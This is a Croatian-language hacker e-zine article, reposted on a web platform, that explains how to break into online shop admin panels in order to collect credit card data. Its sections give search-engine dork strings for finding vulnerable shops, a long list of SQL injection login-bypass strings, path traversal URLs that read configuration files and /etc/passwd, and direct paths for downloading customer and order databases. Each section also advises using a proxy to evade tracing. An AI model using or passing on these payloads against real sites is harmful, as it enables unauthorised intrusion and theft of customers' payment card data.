Copy Link
Add to Bookmark
Report

1x09 Exploiting ShopAdmin

eZine's profile picture
Published in 
phearless
 · 10 months ago

 
...................
...::: phearless zine #1 :::...

.....................>---[ Exploiting ShopAdmin ]---<.......................

...........................>---[ by Re00t ]---<.............................
Re00t[at]ii-labs[dot]org

SADRZAJ:

[0] Uvod
[1] ASP ShopAdmini
[2] Alabanza AlaCar
[3] CommerceSQL
[4] Meta Cart
[5] shop.pl
[6] Windows ShopAdmini
[7] The End



////////////////////////////////////////////////////////////////////////////
--==<[ 0. Uvod
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Evo ja sam takodjer odlucio napisat neki tekst za eZine... odlucio sam
pisati o ranjivostima raznih shopova, prikupljanju cc-a i sve sto se tice
shopadmina, posto nisam vidio niti jedan domaci tekst o tome ! Ako trebate
bilo kakvu pomoc mozete me kontaktirati na moj e-mail ( Re00t@ii-labs.org )
ili irc.krstarica.org #HackGen !!!



////////////////////////////////////////////////////////////////////////////
--==<[ 1. ASP ShopAdmini
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Znaci morate traziti u google-u shop.asp -> To je najcesci ali takodjer
mozete traziti i ove:

shopadmin1.asp
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp

Kada nadjete shopadmin, naravno morate prvo naci one ranjive... onda
koristite sljedece kodove za upadanje u njih:

'or'1
'or''='
'='
Admin
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Te kodove kopirajte i staviti isti kod u username i password... ako je shop
ranjiv, trebali bi dobiti pristup narudzbama, logovima i ostalom...

*** KORISTITE PROXY ***



////////////////////////////////////////////////////////////////////////////
--==<[ 2. Alabanza AlaCar
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Ok ovo je lagano exploitati, trazite u google:

s-cart/admin

Kada ga nadjete, ulogirajte se sa:

Username: =
Password: =

*** KORISTITE PROXY ***



////////////////////////////////////////////////////////////////////////////
--==<[ 3. CommerceSQL
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

CommerceSQL explotajte na sljedeci nacin kada nadjete CommerceSQL SHOP !
Kucajte ove urlove:

Primjer:

http://www.domena.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl

http://www.domena.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi

http://www.domena.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

Ili ako hocete preko google-a

admin/files/order.log

*** KORISTITE PROXY ***



////////////////////////////////////////////////////////////////////////////
--==<[ 4. Meta Cart
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Meta Cart je free shop znaci ne naplacuje se a kako ga exploitati ... :)
Jednostavno...

http://www.domena.com/database/metacart.mdb
http://www.domena.com/metacart/database/metacart.mdb

*** KORISTITE PROXY ***



////////////////////////////////////////////////////////////////////////////
--==<[ 5. shop.pl
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Nije bas jako popularan ali naci cete ga preko google-a. Znaci otkucajte
shop.pl u google-u.

A exploitati ga ovako...

http://www.domena.com/cgi-local/shop.pl/page=shop.cfg is where the config file
is located.

http://www.domena.com/cgi-local/shop.pl/page=../../../../../../../../../../../../../../etc/passwd

http://www.domena.com/cgi-local/shop.pl/page=./product_list

*** KORISTITE PROXY ***



////////////////////////////////////////////////////////////////////////////
--==<[ 6. Windows shopadmini
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Ovi su totalno lame... sve ide preko testa baze :) Trazite preko googla
linkove koji se zavrsavaju sa:

shopdisplaycategories.asp

Kada ga nadjete, umjesto shopdisplaycategories.asp stavite ovo:

shopdbtest.asp

I onda pogledajte sto pise pod xDatabase: shopping and xDblocation:\shop_db
i sada dodajte na Domenu:

/shop_db/shopping.mdb

ili gdje se nalazi shop i skinete bazu s CCima i narudzbama :-) !!!

*** KORISTITE PROXY ***



////////////////////////////////////////////////////////////////////////////
--==<[ 7. The End
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Evo pozdravljam sve sa #ugs, #hackgen, #secure, #office na irc.krstarica.org
Sve s HackGen-a, II-labs-a ...


← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT